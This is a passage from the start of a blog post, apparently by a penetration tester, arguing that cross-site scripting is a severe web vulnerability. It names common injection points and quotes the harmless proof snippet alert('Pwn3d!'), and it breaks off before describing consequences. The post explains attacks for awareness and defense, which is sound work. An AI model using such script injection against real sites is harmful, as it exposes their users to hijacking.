Cross-site scripting, or otherwise known as XSS, is the most common web application vulnerability on the internet. I have found this to be true through both data research and personal experience during penetration testing engagements. What is XSS? Simply put XSS is a vulnerability where a malicious user can insert script-code into an application to later have another user unknowingly execute it. All too often web application developers will overlook sanitizing user input whether throughout the entire application or a single parameter. In my experience some common spots for XSS vulnerabilities to occur are in comments, account names, or titles for pages/posts. Unfortunately, XSS is sometimes seen as a less-than-severe vulnerability. I’m writing this blog to explain how and why XSS is one of the most severe vulnerabilities an application can have.
XSS is bad. Let’s clear the air now. But why is XSS so bad? Is forcing annoying pop-up alerts on unsuspecting users truly that big of a deal? The simple answer is yes; any time a user can create code that is run by another user there should be alarms going off and administrators’ jaws dropping. Let’s go beyond alert(‘Pwn3d!’); and look at some of the severe consequences XSS can lead to...